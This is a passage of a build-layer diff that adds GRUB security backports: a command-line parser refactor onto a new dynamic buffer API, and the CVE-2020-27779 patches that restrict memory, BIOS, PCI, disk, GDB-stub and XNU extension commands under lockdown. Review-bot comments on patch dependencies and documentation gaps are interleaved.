181 * it under the terms of the GNU General Public License as published by
182@@ -18,6 +18,7 @@
183 */
184
185 #include <grub/parser.h>
186+#include <grub/buffer.h>
187 #include <grub/env.h>
188 #include <grub/misc.h>
189 #include <grub/mm.h>
190@@ -107,8 +108,8 @@ check_varstate (grub_parser_state_t s)
191 }
192
193
194-static void
195-add_var (char *varname, char **bp, char **vp,
196+static grub_err_t
197+add_var (grub_buffer_t varname, grub_buffer_t buf,
198 grub_parser_state_t state, grub_parser_state_t newstate)
199 {
200 const char *val;
201@@ -116,17 +117,74 @@ add_var (char *varname, char **bp, char **vp,
202 /* Check if a variable was being read in and the end of the name
203 was reached. */
204 if (!(check_varstate (state) && !check_varstate (newstate)))
205- return;
206+ return GRUB_ERR_NONE;
207+
208+ if (grub_buffer_append_char (varname, '\0') != GRUB_ERR_NONE)
209+ return grub_errno;
210
211- *((*vp)++) = '\0';
212- val = grub_env_get (varname);
213- *vp = varname;
214+ val = grub_env_get ((const char *) grub_buffer_peek_data (varname));
215+ grub_buffer_reset (varname);
216 if (!val)
217- return;
218+ return GRUB_ERR_NONE;
219
220 /* Insert the contents of the variable in the buffer. */
221- for (; *val; val++)
222- *((*bp)++) = *val;
223+ return grub_buffer_append_data (buf, val, grub_strlen (val));
224+}
225+
226+static grub_err_t
227+terminate_arg (grub_buffer_t buffer, int *argc)
228+{
229+ grub_size_t unread = grub_buffer_get_unread_bytes (buffer);
230+
231+ if (unread == 0)
232+ return GRUB_ERR_NONE;
233+
234+ if (*(const char *) grub_buffer_peek_data_at (buffer, unread - 1) == '\0')
235+ return GRUB_ERR_NONE;
236+
237+ if (grub_buffer_append_char (buffer, '\0') != GRUB_ERR_NONE)
238+ return grub_errno;
239+
240+ (*argc)++;
241+
242+ return GRUB_ERR_NONE;
243+}
244+
245+static grub_err_t
246+process_char (char c, grub_buffer_t buffer, grub_buffer_t varname,
247+ grub_parser_state_t state, int *argc,
248+ grub_parser_state_t *newstate)
249+{
250+ char use;
251+
252+ *newstate = grub_parser_cmdline_state (state, c, &use);
253+
254+ /*
255+ * If a variable was being processed and this character does
256+ * not describe the variable anymore, write the variable to
257+ * the buffer.
258+ */
259+ if (add_var (varname, buffer, state, *newstate) != GRUB_ERR_NONE)
260+ return grub_errno;
261+
262+ if (check_varstate (*newstate))
263+ {
264+ if (use)
265+ return grub_buffer_append_char (varname, use);
266+ }
267+ else if (*newstate == GRUB_PARSER_STATE_TEXT &&
268+ state != GRUB_PARSER_STATE_ESC && grub_isspace (use))
269+ {
270+ /*
271+ * Don't add more than one argument if multiple
272+ * spaces are used.
273+ */
274+ return terminate_arg (buffer, argc);
275+ }
276+ else if (use)
277+ return grub_buffer_append_char (buffer, use);
278+
279+ return GRUB_ERR_NONE;
280 }
281
282 grub_err_t
283@@ -135,24 +193,36 @@ grub_parser_split_cmdline (const char *cmdline,
284 int *argc, char ***argv)
285 {
286 grub_parser_state_t state = GRUB_PARSER_STATE_TEXT;
287- /* XXX: Fixed size buffer, perhaps this buffer should be dynamically
288- allocated. */
289- char buffer[1024];
290- char *bp = buffer;
291+ grub_buffer_t buffer, varname;
292 char *rd = (char *) cmdline;
293- char varname[200];
294- char *vp = varname;
295- char *args;
296+ char *rp = rd;
297 int i;
298
299 *argc = 0;
300 *argv = NULL;
301+
302+ buffer = grub_buffer_new (1024);
303+ if (buffer == NULL)
304+ return grub_errno;
305+
306+ varname = grub_buffer_new (200);
307+ if (varname == NULL)
308+ goto fail;
309+
310 do
311 {
312- if (!rd || !*rd)
313+ if (rp == NULL || *rp == '\0')
314 {
315+ if (rd != cmdline)
316+ {
317+ grub_free (rd);
318+ rd = rp = NULL;
319+ }
320 if (getline)
321- getline (&rd, 1, getline_data);
322+ {
323+ getline (&rd, 1, getline_data);
324+ rp = rd;
325+ }
326 else
327 break;
328 }
329@@ -160,39 +230,14 @@ grub_parser_split_cmdline (const char *cmdline,
330 if (!rd)
331 break;
332
333- for (; *rd; rd++)
334+ for (; *rp != '\0'; rp++)
335 {
336 grub_parser_state_t newstate;
337- char use;
338
339- newstate = grub_parser_cmdline_state (state, *rd, &use);
340+ if (process_char (*rp, buffer, varname, state, argc,
341+ &newstate) != GRUB_ERR_NONE)
342+ goto fail;
343
344- /* If a variable was being processed and this character does
345- not describe the variable anymore, write the variable to
346- the buffer. */
347- add_var (varname, &bp, &vp, state, newstate);
348-
349- if (check_varstate (newstate))
350- {
351- if (use)
352- *(vp++) = use;
353- }
354- else
355- {
356- if (newstate == GRUB_PARSER_STATE_TEXT
357- && state != GRUB_PARSER_STATE_ESC && grub_isspace (use))
358- {
359- /* Don't add more than one argument if multiple
360- spaces are used. */
361- if (bp != buffer && *(bp - 1))
362- {
363- *(bp++) = '\0';
364- (*argc)++;
365- }
366- }
367- else if (use)
368- *(bp++) = use;
369- }
370 state = newstate;
371 }
372 }
373@@ -200,43 +245,60 @@ grub_parser_split_cmdline (const char *cmdline,
374
375 /* A special case for when the last character was part of a
376 variable. */
377- add_var (varname, &bp, &vp, state, GRUB_PARSER_STATE_TEXT);
378+ if (add_var (varname, buffer, state, GRUB_PARSER_STATE_TEXT) != GRUB_ERR_NONE)
379+ goto fail;
380
381- if (bp != buffer && *(bp - 1))
382- {
383- *(bp++) = '\0';
384- (*argc)++;
385- }
386+ /* Ensure that the last argument is terminated. */
387+ if (terminate_arg (buffer, argc) != GRUB_ERR_NONE)
388+ goto fail;
389
390 /* If there are no args, then we're done. */
391 if (!*argc)
392- return 0;
393-
394- /* Reserve memory for the return values. */
395- args = grub_malloc (bp - buffer);
396- if (!args)
397- return grub_errno;
398- grub_memcpy (args, buffer, bp - buffer);
399+ {
400+ grub_errno = GRUB_ERR_NONE;
401+ goto out;
402+ }
403
404 *argv = grub_calloc (*argc + 1, sizeof (char *));
405 if (!*argv)
406- {
407- grub_free (args);
408- return grub_errno;
409- }
410+ goto fail;
411
412 /* The arguments are separated with 0's, setup argv so it points to
413 the right values. */
414- bp = args;
415 for (i = 0; i < *argc; i++)
416 {
417- (*argv)[i] = bp;
418- while (*bp)
419- bp++;
420- bp++;
421+ char *arg;
422+
423+ if (i > 0)
424+ {
425+ if (grub_buffer_advance_read_pos (buffer, 1) != GRUB_ERR_NONE)
426+ goto fail;
427+ }
428+
429+ arg = (char *) grub_buffer_peek_data (buffer);
430+ if (arg == NULL ||
431+ grub_buffer_advance_read_pos (buffer, grub_strlen (arg)) != GRUB_ERR_NONE)
432+ goto fail;
433+
434+ (*argv)[i] = arg;
435 }
436
437- return 0;
438+ /* Keep memory for the return values. */
439+ grub_buffer_take_data (buffer);
440+
441+ grub_errno = GRUB_ERR_NONE;
442+
443+ out:
444+ if (rd != cmdline)
445+ grub_free (rd);
446+ grub_buffer_free (buffer);
447+ grub_buffer_free (varname);
448+
449+ return grub_errno;
450+
451+ fail:
452+ grub_free (*argv);
453+ goto out;
454 }
455
456 /* Helper for grub_parser_execute. */
457diff --git a/include/grub/buffer.h b/include/grub/buffer.h
458new file mode 100644
459index 0000000..f4b10cf
460--- /dev/null
461+++ b/include/grub/buffer.h
462@@ -0,0 +1,144 @@
463+/*
464+ * GRUB -- GRand Unified Bootloader
465+ * Copyright (C) 2021 Free Software Foundation, Inc.
466+ *
467+ * GRUB is free software: you can redistribute it and/or modify
468+ * it under the terms of the GNU General Public License as published by
469+ * the Free Software Foundation, either version 3 of the License, or
470+ * (at your option) any later version.
471+ *
472+ * GRUB is distributed in the hope that it will be useful,
473+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
474+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
475+ * GNU General Public License for more details.
476+ *
477+ * You should have received a copy of the GNU General Public License
478+ * along with GRUB. If not, see <http://www.gnu.org/licenses/>.
479+ */
480+
481+#ifndef GRUB_BUFFER_H
482+#define GRUB_BUFFER_H 1
483+
484+#include <grub/err.h>
485+#include <grub/misc.h>
486+#include <grub/mm.h>
487+#include <grub/safemath.h>
488+#include <grub/types.h>
489+
490+struct grub_buffer
491+{
492+ grub_uint8_t *data;
493+ grub_size_t sz;
494+ grub_size_t pos;
495+ grub_size_t used;
496+};
497+
498+/*
499+ * grub_buffer_t represents a simple variable sized byte buffer with
500+ * read and write cursors. It currently only implements
501+ * functionality required by the only user in GRUB (append byte[s],
502+ * peeking data at a specified position and updating the read cursor.
503+ * Some things that this doesn't do yet are:
504+ * - Reading a portion of the buffer by copying data from the current
505+ * read position in to a caller supplied destination buffer and then
506+ * automatically updating the read cursor.
507+ * - Dropping the read part at the start of the buffer when an append
508+ * requires more space.
509+ */
510+typedef struct grub_buffer *grub_buffer_t;
511+
512+/* Allocate a new buffer with the specified initial size. */
513+extern grub_buffer_t grub_buffer_new (grub_size_t sz);
514+
515+/* Free the buffer and its resources. */
516+extern void grub_buffer_free (grub_buffer_t buf);
517+
518+/* Return the number of unread bytes in this buffer. */
519+static inline grub_size_t
520+grub_buffer_get_unread_bytes (grub_buffer_t buf)
521+{
522+ return buf->used - buf->pos;
523+}
524+
525+/*
526+ * Ensure that the buffer size is at least the requested
527+ * number of bytes.
528+ */
529+extern grub_err_t grub_buffer_ensure_space (grub_buffer_t buf, grub_size_t req);
530+
531+/*
532+ * Append the specified number of bytes from the supplied
533+ * data to the buffer.
534+ */
535+static inline grub_err_t
536+grub_buffer_append_data (grub_buffer_t buf, const void *data, grub_size_t len)
537+{
538+ grub_size_t req;
539+
540+ if (grub_add (buf->used, len, &req))
541+ return grub_error (GRUB_ERR_OUT_OF_RANGE, N_("overflow is detected"));
542+
543+ if (grub_buffer_ensure_space (buf, req) != GRUB_ERR_NONE)
544+ return grub_errno;
545+
546+ grub_memcpy (&buf->data[buf->used], data, len);
547+ buf->used = req;
548+
549+ return GRUB_ERR_NONE;
550+}
551+
552+/* Append the supplied character to the buffer. */
553+static inline grub_err_t
554+grub_buffer_append_char (grub_buffer_t buf, char c)
555+{
556+ return grub_buffer_append_data (buf, &c, 1);
557+}
558+
559+/*
560+ * Forget and return the underlying data buffer. The caller
561+ * becomes the owner of this buffer, and must free it when it
562+ * is no longer required.
563+ */
564+extern void *grub_buffer_take_data (grub_buffer_t buf);
565+
566+/* Reset this buffer. Note that this does not deallocate any resources. */
567+void grub_buffer_reset (grub_buffer_t buf);
568+
569+/*
570+ * Return a pointer to the underlying data buffer at the specified
571+ * offset from the current read position. Note that this pointer may
572+ * become invalid if the buffer is mutated further.
573+ */
574+static inline void *
575+grub_buffer_peek_data_at (grub_buffer_t buf, grub_size_t off)
576+{
577+ if (grub_add (buf->pos, off, &off))
578+ {
579+ grub_error (GRUB_ERR_OUT_OF_RANGE, N_("overflow is detected."));
580+ return NULL;
581+ }
582+
583+ if (off >= buf->used)
584+ {
585+ grub_error (GRUB_ERR_OUT_OF_RANGE, N_("peek out of range"));
586+ return NULL;
587+ }
588+
589+ return &buf->data[off];
590+}
591+
592+/*
593+ * Return a pointer to the underlying data buffer at the current
594+ * read position. Note that this pointer may become invalid if the
595+ * buffer is mutated further.
596+ */
597+static inline void *
598+grub_buffer_peek_data (grub_buffer_t buf)
599+{
600+ return grub_buffer_peek_data_at (buf, 0);
601+}
602+
603+/* Advance the read position by the specified number of bytes. */
604+extern grub_err_t grub_buffer_advance_read_pos (grub_buffer_t buf, grub_size_t n);
605+
606+#endif /* GRUB_BUFFER_H */
607--
6082.25.1
609
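--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27779.patch
@@ -0,0 +1,70 @@
+From 584263eca1546e5cab69ba6fe7b4b07df2630a21 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Wed, 14 Oct 2020 16:33:42 +0200
+Subject: [PATCH] mmap: Don't register cutmem and badram commands when lockdown
+ is enforced
+
+The cutmem and badram commands can be used to remove EFI memory regions
+and potentially disable the UEFI Secure Boot. Prevent the commands to be
+registered if the GRUB is locked down.
+
+Fixes: CVE-2020-27779
+
+Reported-by: Teddy Reed <teddy.reed@gmail.com>
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=d298b41f90cbf1f2e5a10e29daa1fc92ddee52c9]
+CVE: CVE-2020-27779
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ docs/grub.texi | 4 ++++
+ grub-core/mmap/mmap.c | 13 +++++++------
+ 2 files changed, 11 insertions(+), 6 deletions(-)
+
+diff --git a/docs/grub.texi b/docs/grub.texi
+index 47ac7ff..a1aaee6 100644
+--- a/docs/grub.texi
++++ b/docs/grub.texi
+@@ -4051,6 +4051,10 @@ this page is to be filtered. This syntax makes it easy to represent patterns
+ that are often result of memory damage, due to physical distribution of memory
+ cells.
+
++Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}).
++ This prevents removing EFI memory regions to potentially subvert the
++ security mechanisms provided by the UEFI secure boot.
++
+ @node blocklist
+ @subsection blocklist
+
+diff --git a/grub-core/mmap/mmap.c b/grub-core/mmap/mmap.c
+index 57b4e9a..7ebf32e 100644
+--- a/grub-core/mmap/mmap.c
++++ b/grub-core/mmap/mmap.c
+@@ -20,6 +20,7 @@
+ #include <grub/memory.h>
+ #include <grub/machine/memory.h>
+ #include <grub/err.h>
++#include <grub/lockdown.h>
+ #include <grub/misc.h>
+ #include <grub/mm.h>
+ #include <grub/command.h>
+@@ -534,12 +535,12 @@ static grub_command_t cmd, cmd_cut;
+
+ GRUB_MOD_INIT(mmap)
+ {
+- cmd = grub_register_command ("badram", grub_cmd_badram,
+- N_("ADDR1,MASK1[,ADDR2,MASK2[,...]]"),
+- N_("Declare memory regions as faulty (badram)."));
+- cmd_cut = grub_register_command ("cutmem", grub_cmd_cutmem,
+- N_("FROM[K|M|G] TO[K|M|G]"),
+- N_("Remove any memory regions in specified range."));
++ cmd = grub_register_command_lockdown ("badram", grub_cmd_badram,
++ N_("ADDR1,MASK1[,ADDR2,MASK2[,...]]"),
++ N_("Declare memory regions as faulty (badram)."));
++ cmd_cut = grub_register_command_lockdown ("cutmem", grub_cmd_cutmem,
++ N_("FROM[K|M|G] TO[K|M|G]"),
++ N_("Remove any memory regions in specified range."));
+
+ }
+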
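Review bot: The mmap.c hunk adds `#include <grub/lockdown.h>` and switches to `grub_register_command_lockdown`, but nothing in this patch defines either, so the backport only builds if the patch introducing the lockdown API is applied before it; the recipe's patch order is not visible in this section and should be confirmed. CVE-2020-27779_2.patch through CVE-2020-27779_6.patch have the same dependency (`grub_register_command_lockdown` / `grub_register_extcmd_lockdown`). A one-line comment in GRUB_MOD_INIT(mmap) would also help the next reader, e.g. `/* badram and cutmem can remove EFI memory regions, so they are restricted under lockdown. */`.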
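--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27779_2.patch
@@ -0,0 +1,105 @@
+From 4ff1dfdf8c4c71bf4b0dd0488d9fa40ff2617f41 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Wed, 24 Feb 2021 09:00:05 +0100
+Subject: [PATCH] commands: Restrict commands that can load BIOS or DT blobs
+ when locked down
+
+There are some more commands that should be restricted when the GRUB is
+locked down. Following is the list of commands and reasons to restrict:
+
+ * fakebios: creates BIOS-like structures for backward compatibility with
+ existing OSes. This should not be allowed when locked down.
+
+ * loadbios: reads a BIOS dump from storage and loads it. This action
+ should not be allowed when locked down.
+
+ * devicetree: loads a Device Tree blob and passes it to the OS. It replaces
+ any Device Tree provided by the firmware. This also should
+ not be allowed when locked down.
+
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=468a5699b249fe6816b4e7e86c5dc9d325c9b09e]
+CVE: CVE-2020-27779
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ docs/grub.texi | 3 +++
+ grub-core/commands/efi/loadbios.c | 16 ++++++++--------
+ grub-core/loader/arm/linux.c | 6 +++---
+ grub-core/loader/efi/fdt.c | 4 ++--
+ 4 files changed, 16 insertions(+), 13 deletions(-)
+
+diff --git a/docs/grub.texi b/docs/grub.texi
+index a1aaee6..ccf1908 100644
+--- a/docs/grub.texi
++++ b/docs/grub.texi
+@@ -4236,6 +4236,9 @@ Load a device tree blob (.dtb) from a filesystem, for later use by a Linux
+ kernel. Does not perform merging with any device tree supplied by firmware,
+ but rather replaces it completely.
+ @ref{GNU/Linux}.
++
++Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}).
++ This is done to prevent subverting various security mechanisms.
+ @end deffn
+
+ @node distrust
+diff --git a/grub-core/commands/efi/loadbios.c b/grub-core/commands/efi/loadbios.c
+index d41d521..5c7725f 100644
+--- a/grub-core/commands/efi/loadbios.c
++++ b/grub-core/commands/efi/loadbios.c
+@@ -205,14 +205,14 @@ static grub_command_t cmd_fakebios, cmd_loadbios;
+
+ GRUB_MOD_INIT(loadbios)
+ {
+- cmd_fakebios = grub_register_command ("fakebios", grub_cmd_fakebios,
+- 0, N_("Create BIOS-like structures for"
+- " backward compatibility with"
+- " existing OS."));
+-
+- cmd_loadbios = grub_register_command ("loadbios", grub_cmd_loadbios,
+- N_("BIOS_DUMP [INT10_DUMP]"),
+- N_("Load BIOS dump."));
++ cmd_fakebios = grub_register_command_lockdown ("fakebios", grub_cmd_fakebios,
++ 0, N_("Create BIOS-like structures for"
++ " backward compatibility with"
++ " existing OS."));
++
++ cmd_loadbios = grub_register_command_lockdown ("loadbios", grub_cmd_loadbios,
++ N_("BIOS_DUMP [INT10_DUMP]"),
++ N_("Load BIOS dump."));
+ }
+
+ GRUB_MOD_FINI(loadbios)
+diff --git a/grub-core/loader/arm/linux.c b/grub-core/loader/arm/linux.c
+index d70c174..ed23dc7 100644
+--- a/grub-core/loader/arm/linux.c
++++ b/grub-core/loader/arm/linux.c
+@@ -493,9 +493,9 @@ GRUB_MOD_INIT (linux)
+ 0, N_("Load Linux."));
+ cmd_initrd = grub_register_command ("initrd", grub_cmd_initrd,
+ 0, N_("Load initrd."));
+- cmd_devicetree = grub_register_command ("devicetree", grub_cmd_devicetree,
+- /* TRANSLATORS: DTB stands for device tree blob. */
+- 0, N_("Load DTB file."));
++ cmd_devicetree = grub_register_command_lockdown ("devicetree", grub_cmd_devicetree,
++ /* TRANSLATORS: DTB stands for device tree blob. */
++ 0, N_("Load DTB file."));
+ my_mod = mod;
+ current_fdt = (const void *) grub_arm_firmware_get_boot_data ();
+ machine_type = grub_arm_firmware_get_machine_type ();
+diff --git a/grub-core/loader/efi/fdt.c b/grub-core/loader/efi/fdt.c
+index ee9c559..003d07c 100644
+--- a/grub-core/loader/efi/fdt.c
++++ b/grub-core/loader/efi/fdt.c
+@@ -165,8 +165,8 @@ static grub_command_t cmd_devicetree;
+ GRUB_MOD_INIT (fdt)
+ {
+ cmd_devicetree =
+- grub_register_command ("devicetree", grub_cmd_devicetree, 0,
+- N_("Load DTB file."));
++ grub_register_command_lockdown ("devicetree", grub_cmd_devicetree, 0,
++ N_("Load DTB file."));
+ }
+
+ GRUB_MOD_FINI (fdt)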
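Review bot: docs/grub.texi gets the lockdown note for `devicetree` only, although the same patch also restricts `fakebios` and `loadbios`; if grub.texi has entries for those two commands (not visible here) they should carry the same `Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}).` text. In grub-core/loader/arm/linux.c the neighbouring `linux` and `initrd` registrations stay unrestricted, so a comment such as `/* devicetree replaces the firmware-provided DT; restricted under lockdown. */` above the changed call would explain the difference. GRUB_MOD_INIT (linux) starts before and continues past that hunk, so the rest of its registrations cannot be checked from here.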
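--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27779_3.patch
@@ -0,0 +1,37 @@
+From e4f5c16f76e137b3beb6b61a6d2435e54fcb495c Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Wed, 24 Feb 2021 22:59:59 +0100
+Subject: [PATCH] commands/setpci: Restrict setpci command when locked down
+
+This command can set PCI devices register values, which makes it dangerous
+in a locked down configuration. Restrict it so can't be used on this setup.
+
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=58b77d4069823b44c5fa916fa8ddfc9c4cd51e02]
+CVE: CVE-2020-27779
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/commands/setpci.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/grub-core/commands/setpci.c b/grub-core/commands/setpci.c
+index d5bc97d..fa2ba7d 100644
+--- a/grub-core/commands/setpci.c
++++ b/grub-core/commands/setpci.c
+@@ -329,10 +329,10 @@ static grub_extcmd_t cmd;
+
+ GRUB_MOD_INIT(setpci)
+ {
+- cmd = grub_register_extcmd ("setpci", grub_cmd_setpci, 0,
+- N_("[-s POSITION] [-d DEVICE] [-v VAR] "
+- "REGISTER[=VALUE[:MASK]]"),
+- N_("Manipulate PCI devices."), options);
++ cmd = grub_register_extcmd_lockdown ("setpci", grub_cmd_setpci, 0,
++ N_("[-s POSITION] [-d DEVICE] [-v VAR] "
++ "REGISTER[=VALUE[:MASK]]"),
++ N_("Manipulate PCI devices."), options);
+ }
+
+ GRUB_MOD_FINI(setpci)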
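Review bot: The lockdown restriction on `setpci` is not documented anywhere in this patch, and the same holds for `hdparm` (CVE-2020-27779_4.patch), the `gdbstub*` commands (_5.patch) and `xnu_mkext`/`xnu_kext`/`xnu_kextdir` (_6.patch); only the first two patches of the series touch docs/grub.texi. Where grub.texi has entries for these commands (not visible here), add the note the series already uses, `Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}).`. In the code, a short reason above each changed call would help, for this one `/* setpci writes PCI device registers, so it is restricted under lockdown. */`.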
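--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27779_4.patch
@@ -0,0 +1,35 @@
+From 7949671de268ba3116d113778e5d770574e9f9e3 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Wed, 24 Feb 2021 12:59:29 +0100
+Subject: [PATCH] commands/hdparm: Restrict hdparm command when locked down
+
+The command can be used to get/set ATA disk parameters. Some of these can
+be dangerous since change the disk behavior. Restrict it when locked down.
+
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=5c97492a29c6063567b65ed1a069f5e6f4e211f0]
+CVE: CVE-2020-27779
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/commands/hdparm.c | 6 +++---
+ 1 file changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/grub-core/commands/hdparm.c b/grub-core/commands/hdparm.c
+index d3fa966..2e2319e 100644
+--- a/grub-core/commands/hdparm.c
++++ b/grub-core/commands/hdparm.c
+@@ -436,9 +436,9 @@ static grub_extcmd_t cmd;
+
+ GRUB_MOD_INIT(hdparm)
+ {
+- cmd = grub_register_extcmd ("hdparm", grub_cmd_hdparm, 0,
+- N_("[OPTIONS] DISK"),
+- N_("Get/set ATA disk parameters."), options);
++ cmd = grub_register_extcmd_lockdown ("hdparm", grub_cmd_hdparm, 0,
++ N_("[OPTIONS] DISK"),
++ N_("Get/set ATA disk parameters."), options);
+ }
+
+ GRUB_MOD_FINI(hdparm)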
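--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27779_5.patch
@@ -0,0 +1,62 @@
+From 6993cce7c3a9d15e6573845f455d2f0de424a717 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Wed, 24 Feb 2021 15:03:26 +0100
+Subject: [PATCH] gdb: Restrict GDB access when locked down
+
+The gdbstub* commands allow to start and control a GDB stub running on
+local host that can be used to connect from a remote debugger. Restrict
+this functionality when the GRUB is locked down.
+
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=508270838998f151a82e9c13e7cb8a470a2dc23d]
+CVE: CVE-2020-27779
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/gdb/gdb.c | 32 ++++++++++++++++++--------------
+ 1 file changed, 18 insertions(+), 14 deletions(-)
+
+diff --git a/grub-core/gdb/gdb.c b/grub-core/gdb/gdb.c
+index 847a1e1..1818cb6 100644
+--- a/grub-core/gdb/gdb.c
++++ b/grub-core/gdb/gdb.c
+@@ -75,20 +75,24 @@ static grub_command_t cmd, cmd_stop, cmd_break;
+ GRUB_MOD_INIT (gdb)
+ {
+ grub_gdb_idtinit ();
+- cmd = grub_register_command ("gdbstub", grub_cmd_gdbstub,
+- N_("PORT"),
+- /* TRANSLATORS: GDB stub is a small part of
+- GDB functionality running on local host
+- which allows remote debugger to
+- connect to it. */
+- N_("Start GDB stub on given port"));
+- cmd_break = grub_register_command ("gdbstub_break", grub_cmd_gdb_break,
+- /* TRANSLATORS: this refers to triggering
+- a breakpoint so that the user will land
+- into GDB. */
+- 0, N_("Break into GDB"));
+- cmd_stop = grub_register_command ("gdbstub_stop", grub_cmd_gdbstop,
+- 0, N_("Stop GDB stub"));
++ cmd = grub_register_command_lockdown ("gdbstub", grub_cmd_gdbstub,
++ N_("PORT"),
++ /*
++ * TRANSLATORS: GDB stub is a small part of
++ * GDB functionality running on local host
++ * which allows remote debugger to
++ * connect to it.
++ */
++ N_("Start GDB stub on given port"));
++ cmd_break = grub_register_command_lockdown ("gdbstub_break", grub_cmd_gdb_break,
++ /*
++ * TRANSLATORS: this refers to triggering
++ * a breakpoint so that the user will land
++ * into GDB.
++ */
++ 0, N_("Break into GDB"));
++ cmd_stop = grub_register_command_lockdown ("gdbstub_stop", grub_cmd_gdbstop,
++ 0, N_("Stop GDB stub"));
+ }
+
+ GRUB_MOD_FINI (gdb)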
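Review bot: `grub_gdb_idtinit ();` on the first line of GRUB_MOD_INIT (gdb) still runs unconditionally, so loading the module under lockdown performs that setup even though all three `gdbstub*` commands are now restricted. What grub_gdb_idtinit changes is not visible in this hunk, so this may be harmless, but it deserves either a guard or at least a comment such as `/* Runs even under lockdown; only the gdbstub* commands are restricted. */`. Any guard added here would need a matching one in GRUB_MOD_FINI (gdb), whose body is outside the hunk.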
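--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27779_6.patch
@@ -0,0 +1,61 @@
+From 73f214761cff76a18a2a867976bdd3a9adb00b67 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Wed, 24 Feb 2021 14:44:38 +0100
+Subject: [PATCH] loader/xnu: Don't allow loading extension and packages when
+ locked down
+
+The shim_lock verifier validates the XNU kernels but no its extensions
+and packages. Prevent these to be loaded when the GRUB is locked down.
+
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=9c5565135f12400a925ee901b25984e7af4442f5]
+CVE: CVE-2020-27779
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/loader/xnu.c | 31 +++++++++++++++++--------------
+ 1 file changed, 17 insertions(+), 14 deletions(-)
+
+diff --git a/grub-core/loader/xnu.c b/grub-core/loader/xnu.c
+index 77d7060..07232d2 100644
+--- a/grub-core/loader/xnu.c
++++ b/grub-core/loader/xnu.c
+@@ -1482,20 +1482,23 @@ GRUB_MOD_INIT(xnu)
+ N_("Load XNU image."));
+ cmd_kernel64 = grub_register_command ("xnu_kernel64", grub_cmd_xnu_kernel64,
+ 0, N_("Load 64-bit XNU image."));
+- cmd_mkext = grub_register_command ("xnu_mkext", grub_cmd_xnu_mkext, 0,
+- N_("Load XNU extension package."));
+- cmd_kext = grub_register_command ("xnu_kext", grub_cmd_xnu_kext, 0,
+- N_("Load XNU extension."));
+- cmd_kextdir = grub_register_command ("xnu_kextdir", grub_cmd_xnu_kextdir,
+- /* TRANSLATORS: OSBundleRequired is a
+- variable name in xnu extensions
+- manifests. It behaves mostly like
+- GNU/Linux runlevels.
+- */
+- N_("DIRECTORY [OSBundleRequired]"),
+- /* TRANSLATORS: There are many extensions
+- in extension directory. */
+- N_("Load XNU extension directory."));
++ cmd_mkext = grub_register_command_lockdown ("xnu_mkext", grub_cmd_xnu_mkext, 0,
++ N_("Load XNU extension package."));
++ cmd_kext = grub_register_command_lockdown ("xnu_kext", grub_cmd_xnu_kext, 0,
++ N_("Load XNU extension."));
++ cmd_kextdir = grub_register_command_lockdown ("xnu_kextdir", grub_cmd_xnu_kextdir,
++ /*
++ * TRANSLATORS: OSBundleRequired is
++ * a variable name in xnu extensions
++ * manifests. It behaves mostly like
++ * GNU/Linux runlevels.
++ */
++ N_("DIRECTORY [OSBundleRequired]"),
++ /*
++ * TRANSLATORS: There are many extensions
++ * in extension directory.
++ */
++ N_("Load XNU extension directory."));
+ cmd_ramdisk = grub_register_command ("xnu_ramdisk", grub_cmd_xnu_ramdisk, 0,
+ /* TRANSLATORS: ramdisk here isn't identifier. It can be translated. */
+ N_("Load XNU ramdisk. "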
